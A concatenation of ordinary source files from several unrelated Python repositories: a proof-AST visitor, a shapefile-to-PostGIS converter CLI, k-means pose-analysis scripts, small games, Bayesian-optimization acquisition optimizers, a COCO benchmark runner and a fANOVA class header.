*arg, visitor=visitor, **kw)
self.qed_step.visit(
*arg, visitor=visitor, **kw)
visitor(self)
# Proof steps
class Hide(_Nodes.Hide):
def visit(self, *arg, visitor=None, **kw):
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class Define(_Nodes.Define):
def visit(self, *arg, visitor=None, **kw):
for defn in self.definitions:
defn.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Assert(_Nodes.Assert):
def visit(self, *arg, visitor=None, **kw):
self.sequent.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Suffices(_Nodes.Suffices):
def visit(self, *arg, visitor=None, **kw):
self.sequent.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Pcase(_Nodes.Pcase):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Pick(_Nodes.Pick):
def visit(self, *arg, visitor=None, **kw):
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Use(_Nodes.Use):
def visit(self, *arg, visitor=None, **kw):
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class Have(_Nodes.Have):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Take(_Nodes.Take):
def visit(self, *arg, visitor=None, **kw):
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
visitor(self)
class Witness(_Nodes.Witness):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Qed(_Nodes.Qed):
def visit(self, *arg, visitor=None, **kw):
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Dvar(_Nodes.Dvar):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bstring(_Nodes.Bstring):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bfloat(_Nodes.Bfloat):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bdef(_Nodes.Bdef):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class BackendPragma(_Nodes.BackendPragma):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
for name, arg_ in self.backend_args:
arg_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
``` |
{
"source": "johnyjpsf/shp2postgis",
"score": 3
} |
#### File: shp2postgis/shp2postgis/__main__.py
```python
import sys, getopt
## Mรณdulo instalado
from shp2postgis.Util import *
from shp2postgis.Shp2Postgis import Shp2Postgis
## Local no projeto
# from Util import *
# from Shp2Postgis import Shp2Postgis
def main():
help_ptbr = "Uso: shp2sql [OPรรO]... --ifile=ARQUIVO \n"
help_ptbr += " ou: shp2sql [OPรรO]... -i ARQUIVO \n"
help_ptbr += "Converte os ARQUIVO(s) shapefile em SQL do PostgreSql com Postgis."
help_ptbr += " Como o shapefile รฉ um conjunto de arquivos nรฃo รฉ necessรกrio usar a extensรฃo apรณs o nome.\n"
help_ptbr += " -h, --help Exibe este texto de ajuda.\n"
help_ptbr += " -H, --help_en Exibe texto de ajuda em inglรชs( show help text in english ).\n"
help_ptbr += " -l, --lower Faz com que os nomes das colunas criadas fiquem em minรบsculo.\n"
help_ptbr += " -v, --verbose Exibe informaรงรตes adicionais ao executar a conversรฃo.\n"
help_ptbr += " -V, --version Exibe versรฃo do programa.\n"
help_ptbr += " -i, --ifil=ARQUIVO Arquivo de entrada com a lista de camadas e shapefiles.\n"
help_ptbr += " Cada linha deve estar no formato <camada>=<path/shapeName>.\n"
help_ptbr += " Uma linha pode ser comentada usando o caracter '#'.\n"
help_ptbr += " -o, --odir=DIRETรRIO Caminho para o diretรณrio onde serรฃo criados os arquivos .sql.\n"
help_ptbr += " padrรฃo: './'\n"
help_ptbr += " -s, --schema=ESQUEMA Nome do esquema do banco de dados que serรก usado para criar as tabelas\n"
help_ptbr += " padrรฃo: 'public'\n"
help_ptbr += " -e, --encoding=CHARSET Cรณdigo para conjunto de caracteres que serรก usado na leitura do shapefile. \n"
help_ptbr += " padrรฃo: 'latin1'\n"
help_ptbr += "Exemplos:\n"
help_ptbr += " python3 shp2sql.py -i ./shapes.txt \n"
help_ptbr += " python3 shp2sql.py --ifile=./shapes.txt --schema=\"ais\" --odir=./saida/\n"
help_ptbr += "Obs:\n"
help_ptbr += " SRID padrรฃo 4326\n"
help_en = "Usage: shp2sql [OPTION]... --ifile=FILE \n"
help_en += " or: shp2sql [OPTION]... -i FILE \n"
help_en += "Converts shapefile FILE(s) in SQL PostgreSql/Postgis."
help_en += " Shapefile is a set of files, so do not use extension after file name.\n"
help_en += " -H, --help_en Show this help text.\n"
help_en += " -h, --help Show this help text (in potuguese).\n"
help_en += " -l, --lower Write column names in lower case.\n"
help_en += " -v, --verbose Show extra information during execution.\n"
help_en += " -V, --version Show version.\n"
help_en += " -i, --ifil=FILE Input file as a list of layers and shapefiles.\n"
help_en += " Each line must be formated as <layer>=<path/shapeName>.\n"
help_en += " Lines can be commented using '#' in the begin os the line.\n"
help_en += " -o, --odir=FOLDER Path to output created SQL files.\n"
help_en += " default: './'\n"
help_en += " -s, --schema=SCHEMA Database schema name to be used on create table.\n"
help_en += " default: 'public'\n"
help_en += " -e, --encoding=CHARSET Charset to be used on shapefile reader. \n"
help_en += " default: 'latin1'\n"
help_en += "Examples:\n"
help_en += " python3 shp2sql.py -i ./shapes.txt \n"
help_en += " python3 shp2sql.py --ifile=./shapes.txt --schema=\"ais\" --odir=./output/\n"
help_en += "Remarks:\n"
help_en += " default SRID 4326\n"
inputFile = None
outputDir = None
schema = None
srid = None
encoding = None
lower = None
verbose = None
log = None
errorMessage = "Veja o uso da ferramenta executando 'python3 -m shp2postgis -h'"
try:
opts, args = getopt.getopt(sys.argv[1:],"LhHvli:o:s:e:V",["log","help","help_en","ifile=","odir=","schema=","encoding=","verbose","lower","version"])
except getopt.GetoptError:
print(errorMessage)
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print(help_ptbr)
sys.exit(2)
elif opt in ("-H", "--help_en"):
print(help_en)
sys.exit(2)
elif opt in ("-V", "--version"):
print(getVersion())
sys.exit(2)
elif opt in ("-i", "--ifile"):
inputFile = arg
elif opt in ("-o", "--odir"):
outputDir = arg
elif opt in ("-s", "--schema"):
schema = arg
elif opt in ("-e", "--encoding"):
encoding = arg
elif opt in ("-v", "--verbose"):
verbose = True
elif opt in ("-l", "--lower"):
lower = True
elif opt in ("-L", "--log"):
log = True
else:
print("Parรขmetro nรฃo esperado. " + errorMessage)
sys.exit(2)
if inputFile == None:
print("Parรขmetro --ifile obrigatรณrio. " + errorMessage)
sys.exit(2)
lista = readDictFile(fileName=inputFile, commentChar="#", separationChar="=")
batchProcess = Shp2Postgis(dictInput=lista, outputPath=outputDir, schema=schema, encoding=encoding, verbose=verbose, log=log, columnsToLower=lower)
batchProcess.run()
sys.exit(0)
if __name__ == "__main__":
main()
```
#### File: shp2postgis/tests/test_Util.py
```python
import unittest
from shp2postgis.Util import *
class verificaUtil(unittest.TestCase):
# def test_template(self):
# #Arrange
# txt = "exemplo de teste"
# esperado = "exemplo_de_teste"
# #Act
# resultado = txt.replace(" ","_")
# #Assert
# self.assertEqual(esperado, resultado)
def test_retorna_dicionario_quando_le_arquivo(self):
#Arrange
fileName = "/home/johny/dev/carregador-geoportal/app/tests/input/test_input_readDictFile.txt"
esperado = {
"airport":"aerodromo",
"airspace":"espaco_aereo",
"waypoint":"waypoint"
}
#Act
dicionario = readDictFile(fileName)
#Assert
self.assertEqual(esperado, dicionario)
def test_retorna_lista_quando_le_arquivo(self):
#Arrange
fileName = "/home/johny/dev/carregador-geoportal/app/tests/input/test_input_readListFile.txt"
commentChar = "#"
esperado = ["airspace","waypoint"]
#Act
resultado = readListFile(fileName, commentChar)
#Assert
self.assertEqual(esperado, resultado)
``` |
{
"source": "johny-kampe/Athletic-Performance-Optimization-Diploma-Thesis",
"score": 3
} |
#### File: johny-kampe/Athletic-Performance-Optimization-Diploma-Thesis/machine_learning_algorithm.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import spatial
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score
from sklearn.metrics.pairwise import cosine_similarity
from numpy import dot
from numpy.linalg import norm
from math import sqrt
def calculate_similarity(dataset_correct, dataset_A):
# array_vec_1 = np.array([[12, 41, 60, 11, 21]])
# array_vec_2 = np.array([[40, 11, 4, 11, 14]])
# print(cosine_similarity(array_vec_1, array_vec_2))
count = 0
# DATASET CORRECT
shoulderx_corr = dataset_correct["Right shoulder x"]
shouldery_corr = dataset_correct["Right shoulder y"]
elbowx_corr = dataset_correct["Right elbow x"]
elbowy_corr = dataset_correct["Right elbow y"]
wristx_corr = dataset_correct["Right wrist x"]
wristy_corr = dataset_correct["Right wrist y"]
# DATASET A
shoulderxA = datasetA["Right shoulder x"]
shoulderyA = datasetA["Right shoulder y"]
elbowxA = datasetA["Right elbow x"]
elbowyA = datasetA["Right elbow y"]
wristxA = datasetA["Right wrist x"]
wristyA = datasetA["Right wrist y"]
# COORDINATES
shoulderx_list = np.arange(30).reshape(-1, 1)
shouldery_list = []
elbowx_list = []
elbowy_list = []
wristx_list = []
wristy_list = []
# RESULTS
shoulderx_list_res = []
shouldery_list_res = []
elbowx_list_res = []
elbowy_list_res = []
wristx_list_res = []
wristy_list_res = []
Alist = []
# for i in shoulderx_corr:
# if count < 30:
# shoulderx_list[count] = i
# else:
# count = 0
# # array_vec_1 = np.array([shoulderx_list]).reshape(-1, 1)
# array_vec_2 = np.array([shoulderxA]).reshape(-1, 1)
# shoulderx_list_res.append(cosine_similarity(shoulderx_list, array_vec_2))
# print(f"similarity: {cosine_similarity(shoulderx_list, array_vec_2)}")
# count += 1
for i in range(30):
print(shouldery_corr[i])
Alist.append(shouldery_corr[i])
for i in shouldery_corr:
if count < 30:
shouldery_list.append(i)
count += 1
else:
count = 0
print(shouldery_list)
# array_vec_1 = np.array([shouldery_list])
# array_vec_2 = np.array([shoulderyA])
# shouldery_list_res.append(cosine_similarity(array_vec_1, array_vec_2) * 100)
result = 1 - spatial.distance.cosine(shouldery_list, Alist)
print(f"Result: {result}")
# cos_sim(shoulderx_list, Alist)
shouldery_list = []
#
#
# for i in elbowx_corr:
# if count < 30:
# elbowx_list.append(i)
# else:
# count = 0
# print(elbowx_list)
# array_vec_1 = np.array([elbowx_list])
# array_vec_2 = np.array([elbowxA])
# elbowx_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
#
# count = 0
# for i in elbowy_corr:
# if count < 30:
# shoulderx_list.append(i)
# else:
# count = 0
# print(elbowy_list)
# array_vec_1 = np.array([elbowy_list])
# array_vec_2 = np.array([elbowyA])
# elbowy_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
#
# for i in wristx_corr:
# if count < 30:
# wristx_list.append(i)
# else:
# count = 0
# print(wristx_list)
# array_vec_1 = np.array([wristx_list])
# array_vec_2 = np.array([wristxA])
# wristx_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
#
# for i in wristy_corr:
# if count < 30:
# wristy_list.append(i)
# else:
# count = 0
# print(wristy_list)
# array_vec_1 = np.array([wristy_list])
# array_vec_2 = np.array([wristyA])
# wristy_list_res(cosine_similarity(array_vec_1, array_vec_2) * 100)
# count += 1
# for i in range(0, 30):
# shoulderx_list[i] /= 49
# shouldery_list[i] /= 49
#
# elbowx_list[i] /= 49
# elbowy_list[i] /= 49
#
# wristx_list[i] /= 49
# wristy_list[i] /= 49
def elbow_function_silhouette_score(dataset):
# calculate the number of clusters with elbow function
wss = []
for i in range(1, 10):
kmeans = KMeans(n_clusters=i, init='k-means++', random_state=1)
kmeans.fit(dataset)
wss.append(kmeans.inertia_)
plt.plot(range(1, 10), wss)
plt.title('The Elbow method')
plt.xlabel('Number of clusters')
plt.ylabel('Sum of squared distances')
plt.show()
# calculate silhouette score of the dataset
for i in range(2, 10):
kmeans = KMeans(n_clusters=i, max_iter=100)
kmeans.fit(dataset)
score = silhouette_score(dataset, kmeans.labels_)
print("For cluster: {}, the silhouette score is: {}".format(i, score))
silhouette_coefficients = []
for i in range(2, 10):
kmeans = KMeans(n_clusters=i, max_iter=100)
kmeans.fit(dataset)
score = silhouette_score(dataset, kmeans.labels_)
silhouette_coefficients.append(score)
plt.plot(range(2, 10), silhouette_coefficients)
plt.xticks(range(2, 10))
plt.xlabel("number of clusters")
plt.ylabel("Silhouette coefficient")
plt.show()
print('\n')
def show_plots(dataset):
plt.scatter(dataset["Right shoulder x"], dataset["Right shoulder y"]) # plot the datasetฮ
plt.xlabel('x')
plt.ylabel('y')
plt.show()
plt.scatter(dataset["Right elbow x"], dataset["Right elbow y"]) # plot the datasetฮ
plt.xlabel('x')
plt.ylabel('y')
plt.show()
plt.scatter(dataset["Right wrist x"], dataset["Right wrist y"]) # plot the datasetฮ
plt.xlabel('x')
plt.ylabel('y')
plt.show()
def find_clusters(dataset):
km = KMeans(n_clusters=3)
y_predicted = km.fit_predict(datasetB)
dataset['cluster'] = y_predicted
df1 = dataset[dataset.cluster == 0]
df2 = dataset[dataset.cluster == 1]
df3 = dataset[dataset.cluster == 2]
plt.scatter(df1["Right shoulder x"], df1["Right shoulder y"], color='green')
plt.scatter(df2["Right shoulder x"], df2["Right shoulder y"], color='red')
plt.scatter(df3["Right shoulder x"], df3["Right shoulder y"], color='black')
plt.xlabel('x')
plt.ylabel('y')
plt.legend()
plt.show()
def kmeans_clustering_visualization(datasetB):
to_plot_shoulderB = pd.concat([datasetB[["Right shoulder x", "Right shoulder y"]]], join='outer', axis=1)
to_plot_elbowB = pd.concat([datasetB[["Right elbow x", "Right elbow y"]]], join='outer', axis=1)
to_plot_wristB = pd.concat([datasetB[["Right wrist x", "Right wrist y"]]], join='outer', axis=1)
# to_plot_shoulderC = pd.concat([datasetB[["Right shoulder x", "Right shoulder y"]]], join='outer', axis=1)
# to_plot_elbowC = pd.concat([datasetB[["Right elbow x", "Right elbow y"]]], join='outer', axis=1)
# to_plot_wristC = pd.concat([datasetB[["Right wrist x", "Right wrist y"]]], join='outer', axis=1)
show_plots(datasetB)
elbow_function_silhouette_score(to_plot_shoulderB)
elbow_function_silhouette_score(to_plot_elbowB)
elbow_function_silhouette_score(to_plot_wristB)
find_clusters(to_plot_shoulderB)
# find_clusters(to_plot_elbowB)
# find_clusters(to_plot_wristB)
datasetA = pd.read_excel('dataset.xls')
datasetB = pd.read_excel('real_world_set_A.xls')
datasetC = pd.read_excel('real_world_set_B.xls')
# calculate_similarity(datasetA, datasetB)
kmeans_clustering_visualization(datasetB)
``` |
{
"source": "johny-kampe/Python-Projects",
"score": 4
} |
#### File: Python-Projects/Higher Lower Project/main.py
```python
from game_data import data
from art import logo, vs
import random as rand
from replit import clear
def new_star():
star = rand.choice(data)
return star
def find_max(followsA, followsB):
max = ""
if followsA > followsB:
max = "A"
elif followsA < followsB:
max = "B"
elif followsA == followsB:
max = -1
return max
starA = []
starB = []
starA = new_star()
score = 0
end_game = False
while end_game != True:
print(logo)
if score > 0:
print(f"You're right! Current score: {score}.")
print(f"Compare A: {starA['name']}, {starA['description']}, from {starA['country']}")
print(vs)
starB = new_star()
print(f"Compare B: {starB['name']}, {starB['description']}, from {starB['country']}")
choice = input("Who has more followers? Type 'A' or 'B': ")
if choice == find_max(starA['follower_count'], starB['follower_count']):
score+=1
starA = starB
clear()
else:
end_game = True
clear()
print(logo)
print(f"Sorry, that's wrong. Final score: {score}")
```
#### File: Python-Projects/quiz-game-start/quiz_brain.py
```python
class QuizBrain:
def __init__(self, input_list):
self.question_number = 0
self.question_list = input_list
self.score = 0
def still_has_questions(self):
if self.question_number < len(self.question_list):
return True
else:
return False
def next_question(self):
next = self.question_list[self.question_number]
self.question_number += 1
answer = input(f"Q.{self.question_number}: {next.text} (True/False)?: ")
self.check_answer(answer, next.answer)
def check_answer(self, user_ans, corr_ans):
if user_ans.lower() == corr_ans.lower():
print("You got it right!")
self.score += 1
else:
print("That's wrong.")
print(f"The correct answer was: {corr_ans}.")
print(f"Your current score is {self.score}/{self.question_number}")
``` |
{
"source": "JohnYKiyo/bayes_opt",
"score": 2
} |
#### File: bayes_opt/bayesopt/acquisition_optimizer.py
```python
from jax.config import config
config.update("jax_enable_x64", True)
import jax.numpy as np
import numpy as onp
from GaussianProcess.utils import transform_data
class BaseOptimizer(object):
def __init__(self, bounds):
self.bounds = np.atleast_2d(bounds)
self.ndim = len(self.bounds)
def __call__(self, gpr, acq, it):
return self.optimize(gpr, acq, it)
def optimize(self, gpr, acq, it):
raise NotImplementedError("The optimize method is not implemented in the parent class.")
class Acquisition_L_BFGS_B_Optimizer(BaseOptimizer):
def __init__(self, bounds, n_trial=2):
"""Optimizer for acquisition function by L-BFGS-B.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
n_trial (int, optional): Number of trials to stabilize the L-BFGS-B. Defaults to 2.
"""
super(Acquisition_L_BFGS_B_Optimizer, self).__init__(bounds)
self.n_trial = n_trial
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
loc = None
value = None
import scipy.optimize
def Obj(x):
mu, sigma = gpr.posterior_predictive(np.atleast_2d(x), return_std=True)
return -1. * acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
x_seeds = onp.random.uniform(self.bounds[:, 0], self.bounds[:, 1], size=(self.n_trial, self.ndim))
for xtry in x_seeds:
res = scipy.optimize.fmin_l_bfgs_b(Obj,
x0=xtry,
bounds=self.bounds,
approx_grad=True,
maxiter=100)
if (loc is None) or (res[1] < value):
loc = res[0]
value = res[1]
return loc, value
class Acquisition_L_BFGS_B_LogOptimizer(BaseOptimizer):
def __init__(self, bounds, n_trial=2):
"""Optimizer for acquisition function by L-BFGS-B.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
n_trial (int, optional): Number of trials to stabilize the L-BFGS-B. Defaults to 2.
"""
super(Acquisition_L_BFGS_B_LogOptimizer, self).__init__(bounds)
self.n_trial = n_trial
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
loc = None
value = None
import scipy.optimize
def Obj(x):
ex = np.power(10, x)
mu, sigma = gpr.posterior_predictive(np.atleast_2d(ex), return_std=True)
return -1. * acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
x_seeds = onp.random.uniform(self.bounds[:, 0], self.bounds[:, 1], size=(self.n_trial, self.ndim))
for xtry in x_seeds:
res = scipy.optimize.fmin_l_bfgs_b(Obj,
x0=xtry,
bounds=self.bounds,
approx_grad=True,
maxiter=100)
if (loc is None) or (res[1] < value):
loc = np.power(10, res[0])
value = res[1]
return loc, value
class Acquisition_SLSQP_Optimizer(BaseOptimizer):
def __init__(self, bounds, n_trial=2):
"""Optimizer for acquisition function by SLSQP.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
n_trial (int, optional): Number of trials to stabilize the SLSQP. Defaults to 2.
"""
super(Acquisition_SLSQP_Optimizer, self).__init__(bounds)
self.n_trial = n_trial
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
loc = None
value = None
import scipy.optimize
def Obj(x):
mu, sigma = gpr.posterior_predictive(np.atleast_2d(x), return_std=True)
return -1. * acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
x_seeds = onp.random.uniform(self.bounds[:, 0], self.bounds[:, 1], size=(self.n_trial, self.ndim))
for xtry in x_seeds:
res = scipy.optimize.fmin_slsqp(Obj,
x0=xtry,
bounds=self.bounds,
iprint=0,
full_output=True,
iter=100)
if (loc is None) or (res[1] < value):
loc = res[0]
value = res[1]
return loc, value
class Acquisition_Grid_Optimizer(BaseOptimizer):
def __init__(self, bounds, step):
"""Optimizer for acquisition function by Grid search.
Args:
bounds (array-like):
An array giving the search range for the parameter.
:[[param1 min, param1 max],...,[param k min, param k max]]
step (array-like): Grid size. [param1 step size, param2 step size,..., param k step size]
"""
super(Acquisition_Grid_Optimizer, self).__init__(bounds)
self.step = step
def optimize(self, gpr, acq, it):
vmax = np.max(gpr.Y_train)
vmin = np.min(gpr.Y_train)
GS = GridSampler(self.bounds, self.step)
mu_s, std_s = gpr.posterior_predictive(GS.grid, return_std=True)
val = acq(mu_s, std_s, it=it, vmax=vmax, vmin=vmin).ravel()
return GS.grid[np.argmax(val)], np.max(val)
class GridSampler(object):
def __init__(self, bounds, step):
self.__Xmin = np.atleast_2d(bounds)[:, 0]
self.__Xmax = np.atleast_2d(bounds)[:, 1]
# data dimention check
if self.__Xmin.shape != self.__Xmax.shape:
raise ValueError('Xmin,Xmax should be same size.')
self.__ndim = len(self.__Xmin)
# step size init
self.__step = transform_data(step)
if (self.__step.shape != (self.__ndim, 1)):
if self.__step.shape[1] != 1:
raise ValueError('step should be an 1-D array_like or a numerical value.')
if self.__step.shape[0] == 1:
self.__step = np.full_like(self.__Xmin, step)
else:
raise ValueError(f'step shape should be same shape of Xmin and Xmax: {self.__Xmin.shape}, but get{self.__step.shape}')
# generate grid points
d_list = tuple(np.arange(mi, ma, st) for mi, ma, st in zip(self.__Xmin, self.__Xmax, self.__step))
self.grid = np.array(np.meshgrid(*d_list)).reshape(self.__ndim, -1).T
# iterator
self.__i = 0
def __iter__(self):
return self
def __next__(self):
if self.__i == len(self.grid):
raise StopIteration()
ret = tuple(self.grid[self.__i])
self.__i += 1
return ret
def __call__(self):
return self.grid
# def AcquisitionLBFGSBOptimizer(gpr, acq, it, bounds, n_trial=2):
# bounds = np.atleast_2d(bounds)
# vmax = np.max(gpr.Y_train)
# vmin = np.min(gpr.Y_train)
# ndim = len(bounds)
# loc = None
# value = None
#
# import scipy.optimize
# def Obj(x):
# mu, sigma = gpr.posterior_predictive(np.atleast_2d(x), return_std=True)
# return -1.*acq(mu, sigma, it=it, vmax=vmax, vmin=vmin).ravel()
#
# x_seeds = onp.random.uniform(bounds[:,0],bounds[:,1], size=(n_trial,ndim))
# for xtry in x_seeds:
# res = scipy.optimize.fmin_l_bfgs_b(Obj,
# x0=xtry,
# bounds=bounds,
# approx_grad=True,
# maxiter=100)
# if (loc is None) or (res[1] < value):
# loc = res[0]
# value = res[1]
# return loc, value
# def AcquisitionSLSQPOptimizer(gpr, acq, it, bounds, n_trial=2):
# bounds = np.atleast_2d(bounds)
# vmax = np.max(gpr.Y_train)
# vmin = np.min(gpr.Y_train)
# ndim = len(bounds)
# loc = None
# value = None
#
# import scipy.optimize
# def Obj(x):
# mu,sigma = gpr.posterior_predictive(np.atleast_2d(x),return_std=True)
# return -1.*acq(mu,sigma, it=it, vmax=vmax, vmin=vmin).ravel()
#
# x_seeds = onp.random.uniform(bounds[:,0],bounds[:,1], size=(n_trial,ndim))
# for xtry in x_seeds:
# res = scipy.optimize.fmin_slsqp(Obj,
# x0=xtry,
# bounds=bounds,
# iprint=0,
# full_output=True,
# iter=100)
# if (loc is None) or (res[1] < value):
# loc = res[0]
# value = res[1]
# return loc, value
# def AcquisitionGridOptimizer(gpr, acq, it, bounds, step):
# bounds = np.atleast_2d(bounds)
# vmax = np.max(gpr.Y_train)
# vmin = np.min(gpr.Y_train)
#
# GS = GridSampler(bounds,step)
# mu_s, std_s = gpr.posterior_predictive(GS.grid,return_std=True)
# val = acq(mu_s, std_s, it=it, vmax=vmax, vmin=vmin).ravel()
# return GS.grid[np.argmax(val)],np.max(val)
# class GridSampler(object):
# def __init__(self, bounds, step):
# self.__Xmin = np.atleast_2d(bounds)[:,0]
# self.__Xmax = np.atleast_2d(bounds)[:,1]
# ##data dimention check
# if self.__Xmin.shape != self.__Xmax.shape :
# raise ValueError('Xmin,Xmax should be same size.')
# self.__ndim = len(self.__Xmin)
#
# ##step size init
# self.__step = transform_data(step)
# if (self.__step.shape != (self.__ndim,1)):
# if self.__step.shape[1] != 1:
# raise ValueError('step should be an 1-D array_like or a numerical value.')
# if self.__step.shape[0] == 1:
# self.__step = np.full_like(self.__Xmin,step)
# else:
# raise ValueError(f'step shape should be same shape of Xmin and Xmax: {self.__Xmin.shape}, but get{self.__step.shape}')
#
# ##generate grid points
# d_list = tuple(np.arange(mi,ma,st) for mi,ma,st in zip(self.__Xmin,self.__Xmax,self.__step))
# self.grid = np.array(np.meshgrid(*d_list)).reshape(self.__ndim,-1).T
#
# ###iterator###
# self.__i = 0
#
# def __iter__(self):
# return self
#
# def __next__(self):
# if self.__i == len(self.grid):
# raise StopIteration()
# ret = tuple(self.grid[self.__i])
# self.__i += 1
# return ret
#
# def __call__(self):
# return self.grid
``` |
{
"source": "JohnYKiyo/coco_trial",
"score": 2
} |
#### File: coco_trial/solver/experiment.py
```python
from cocoex import default_observers
from cocoex import Observer
from cocoex import Suite
from cocoex.utilities import ObserverOptions
from tqdm import tqdm
from typing import Callable # NOQA
from typing import Optional # NOQA
from scipy.optimize import fmin
class Experiment(object):
def __init__(self,
solver,
suite_name="bbob",
suite_instance="",
suite_options="dimensions: 2,3",
algorithm_name=None):
self._solver = solver
self._suite_name = suite_name
self._suite_instance = suite_instance
self._suite_options = suite_options
self._algorithm_name = algorithm_name
def _build_observer_options(self, budget):
# type: (int) -> ObserverOptions
'''
self._algorithm_name = 'hoge'
self._suite_name = 'bbob'
budget = 100
return {'result_folder': '"hoge/on_bbob_budget0100xDim"', 'algorithm_name': 'hoge'}
'''
opts = {
'result_folder':
'"%s/on_%s_budget%04dxDim"' %
(self._algorithm_name, self._suite_name, budget),
'algorithm_name': self._algorithm_name
}
return ObserverOptions(opts)
def run(self,budget=1e1, # use 1e1 or even 2 for a quick first test run
current_batch=1,
number_of_batches=15):
suite = Suite(self._suite_name,self._suite_instance,self._suite_options) #bbox้ขๆฐใใใฑใผใธใชในใใฟใใใชใใค
observer_name = default_observers()[self._suite_name]
observer_options = self._build_observer_options(budget)
observer = Observer(observer_name, observer_options.as_string)
#observer = Observer("bbob", "result_folder: myoptimizer-on-bbob")
for p_index, p in enumerate(tqdm(suite)):# loop over all problems
if (p_index % number_of_batches) != current_batch - 1:
continue
observer.observe(p)# prepare logging of necessary data
max_evals = budget * p.dimension
self._solver(p,
p.initial_solution,
p.lower_bounds,
p.upper_bounds,
p.dimension,
p.evaluations_constraints,
max_evals)
#for p in suite: # loop over all problems
# observer.observe(p) # prepare logging of necessary data
# fmin(p, p.initial_solution) # disp=False would silence fmin output
# while (not p.final_target_hit and # apply restarts, if so desired
# p.evaluations < p.dimension * budget_multiplier):
# fmin(p, p.lower_bounds + (rand(p.dimension) + rand(p.dimension)) *
# (p.upper_bounds - p.lower_bounds) / 2)
```
#### File: coco_trial/solver/scipy_fmin.py
```python
import numpy as np
from numpy.random import rand
from scipy.optimize import fmin
#y_best = float('inf')
x_best = np.zeros(0)
x_list = []
#y_list = []
def solve(objective,
x0,
lower_bounds,
upper_bounds,
dim,
eval_constraints,
max_evals):
global x_best,x_list
#y_best = float('inf')
x_best = np.zeros(0)
x_best = fmin(objective, x0)
while (not objective.final_target_hit and # apply restarts, if so desired
objective.evaluations < dim * max_evals):
x_best = fmin(objective,
lower_bounds + (rand(dim) + rand(dim))*(upper_bounds - lower_bounds) / 2)
``` |
{
"source": "JohnYKiyo/density_ratio_estimation",
"score": 2
} |
#### File: JohnYKiyo/density_ratio_estimation/setup.py
```python
from setuptools import setup
# from setuptools import find_packages
def _requires_from_file(filename):
return open(filename).read().splitlines()
with open("README.md", "r") as f:
long_description = f.read()
setup(
name="densityratio",
version="1.0.1",
license="MIT License + LICENSE file",
description="A Python Package for Direct density estimation by unconstrained Least-Squares Importance Fitting (uLSIF).",
long_description=long_description,
long_description_content_type='text/markdown',
author="<NAME>",
author_email='<EMAIL>',
url="https://github.com/JohnYKiyo/density_ratio_estimation",
keywords='density ratio estimation',
python_requires=">=3.6.0",
packages=['densityratio', 'densityratio.densityratio'],
package_dir={'densityratio': 'src'},
install_requires=[
'jax>=0.1.57',
'jaxlib>=0.1.37'
]
)
``` |
{
"source": "JohnYKiyo/fANOVA",
"score": 3
} |
#### File: fANOVA/functionalANOVA/fanova.py
```python
from typing import (
Tuple,
List,
Union,
Dict,
Optional,
)
import numpy as np
import pandas as pd
import itertools
from sklearn.ensemble import RandomForestRegressor
from .forest_tree import ForestTree
from copy import deepcopy
class FunctionalANOVA(object):
"""__init__
Args:
X (pd.DataFrame): DataFrame with the features.
y (pd.DataFrame): DataFrame with the response values. DataFrame dimension shuld be 1-dim.
search_spaces (Optional[np.ndarray], optional): The ranges of features. Ex:[[MIN, MAX], ..., [MIN, MAX]] ndarray. Defaults to None.
degree (int, optional): Combination order of features. Defaults to 1.
n_tree (int, optional): Number of trees in the forest to be fit. Defaults to 32.
max_depth (int, optional): Maximal depth of each tree in the forest. Defaults to 64.
min_samples_leaf (int, optional): Minimum number of samples required in a leaf. Defaults to 1.
min_samples_split (int, optional): Minimum number of samples required to attempt to split . Defaults to 2.
seed (int, optional): Seed for the forests randomness. Defaults to 0.
"""
def __init__(
self,
X: pd.DataFrame,
y: pd.DataFrame,
search_spaces: Optional[np.ndarray] = None,
degree: int = 1,
n_tree: int = 32,
max_depth: int = 64,
min_samples_leaf: int = 1,
min_samples_split: int = 2,
seed: int = 0,
) -> None:
self._X = deepcopy(X)
